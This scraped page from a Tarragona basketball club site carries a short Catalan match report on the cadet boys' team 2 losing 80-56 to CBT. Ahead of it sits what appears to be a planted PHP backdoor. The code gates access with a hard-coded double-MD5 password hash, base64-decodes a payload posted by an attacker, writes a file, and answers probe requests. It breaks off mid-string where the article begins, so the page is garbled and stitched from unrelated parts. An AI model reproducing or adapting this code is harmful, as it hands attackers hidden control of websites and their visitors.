function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" El cadet masculí 2 fa un pèssim quart període i perd contra el CBT (80-56) - Tgn Bàsquet Club -

El cadet masculí 2 fa un pèssim quart període i perd contra el CBT (80-56)

Updated: novembre 10, 2015

El cadet masculí 2 del TGN Bàsquet va tirar a terra tota la feina feta durant 30 minuts i va perdre amb claredat contra el CBT. L’equip que entrena Adrià Adam, que es va refer d’un mal inici (24-7) gràcies Paris i Virgili, va plantejar una defensa pressionant a tota la pista en el tercer quart que va posar les coses molt difícils als locals. Malgrat tot, quatre cistelles seguides del CBT en l’inici del quart període van descentrar els visitants que van encaixar un parcial de 28-7, amb 14 punts d’Álvarez.